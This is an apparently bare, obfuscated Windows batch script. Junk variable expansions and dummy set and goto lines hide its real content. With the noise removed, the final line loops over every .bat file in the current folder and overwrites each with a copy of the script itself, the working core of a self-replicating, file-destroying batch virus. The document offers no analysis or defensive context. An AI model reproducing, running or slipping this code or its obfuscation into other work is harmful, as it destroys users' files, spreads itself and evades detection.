se%Ί@`@%t ng=D
set ng=s
goto%`xq% D
set ng=LƗ
:D
%Ӟ%s%ysOt%e%y˽%t =FW_
set =a
got%Nϔ%o FW_
%bUf%se%̓mAe%t =Dk̓J
MۦEA%q٩ZI%UVi
:FW_
echo pla²hlhC
set [jm}=TĤ
%Sٵ%set%pϽg]D% [jm}=)
%ΑǸ%goto TĤ
set %tCJ%[jm}=Izb}
:TĤ
se%@%t%% L=%U%nYS
s%ׂB%et%hGYfF% L=*
g%xں%oto%W% %l\_?t%nYS
set L=zP˨
goto [l
:[l
:nYS
set um=PiGz
%[%s%T%et %o%um=%%o
g%e%oto PiGz
se%eTf]%t um=dg
%̟_@%SHm̚q
:PiGz
set Q=nxb
set lIVtH=
s%Zl%e%ϽƓH{%t Q=%oX%n
goto {p?
:{p?
g%WNbv%oto nxb
set Q=_qNCĸ
:nxb
set %RH]v%\T_=OBIjR
set ϏȕE?EqқOF=
set \T_=%0
%B%goto OBIjR
set \T_=lwlOX
:OBIjR
s%ׁn%et aP`F=eĕy
set%jД% aP`F=%زJ%p
go%G%to eĕy
set %%aP`F=
:eĕy
se%v%t G}Ao}=d
s%`̯%et G}Ao}=.
goto%̨% d
set G}Ao}=pm
:d
f%um%r %%a i%Q% (%L%%G}Ao}%b%%t%[jm}% d%um% c%um%%aP`F%y %\T_% %%a
